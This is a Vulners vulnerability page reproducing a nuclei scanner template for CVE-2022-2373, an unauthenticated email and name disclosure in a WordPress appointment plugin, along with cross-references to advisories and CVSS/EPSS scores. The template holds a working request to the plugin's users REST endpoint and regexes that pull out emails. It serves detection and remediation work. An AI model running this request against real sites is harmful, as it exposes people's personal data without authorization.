Vulners
Lucene search
WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure
šļøĀ 03 Jun 2026Ā 06:04:49Reported byĀ ProjectDiscoveryTypeĀ 
Ā nucleišĀ github.comšĀ 25Ā Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2022-2373 | 29 Aug 202218:15 | ā | attackerkb |
 | CVE-2022-2373 | 29 Aug 202222:34 | ā | circl |
 | WordPress plugin Simply Schedule Appointments å®å Øę¼ę“ | 29 Aug 202200:00 | ā | cnnvd |
 | CVE-2022-2373 | 29 Aug 202217:15 | ā | cve |
 | CVE-2022-2373 Simply Schedule Appointments < 1.5.7.7 - Unauthenticated Email Address Disclosure | 29 Aug 202217:15 | ā | cvelist |
 | EUVD-2022-34640 | 3 Oct 202520:07 | ā | euvd |
 | CVE-2022-2373 | 29 Aug 202218:15 | ā | nvd |
 | WordPress Simply Schedule Appointments plugin <= 1.5.7.6 - Unauthenticated Email Address Disclosure vulnerability | 8 Aug 202200:00 | ā | patchstack |
 | Authentication flaw | 29 Aug 202218:15 | ā | prion |
 | PT-2022-16234 Ā· WordPress Ā· Simply Schedule Appointments | 29 Aug 202200:00 | ā | ptsecurity |
10
id: CVE-2022-2373
info:
name: WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure
author: theamanrawat,theabhinavgaur
severity: medium
description: |
WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address.
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the target system.
remediation: |
Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability.
reference:
- https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31
- https://wordpress.org/plugins/simply-schedule-appointments/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2373
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2373
cwe-id: CWE-862
epss-score: 0.08392
epss-percentile: 0.92456
cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: nsqua
product: simply_schedule_appointments
framework: wordpress
tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/ssa/v1/users"
matchers-condition: and
matchers:
- type: word
part: header
words:
- application/json
- type: regex
regex:
- 'response_code":200'
- '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"http?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"'
condition: and
- type: status
status:
- 200
# digest: 4b0a004830460221008ca1c799d5d1897c3375df04be17e8014cd47fb34fdc8a8019e880f2f312d53f022100fddcc09396093216085e15304b8e2916b6c895be29fa113c4ad1d80c853e0991:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.15.3
EPSS0.08392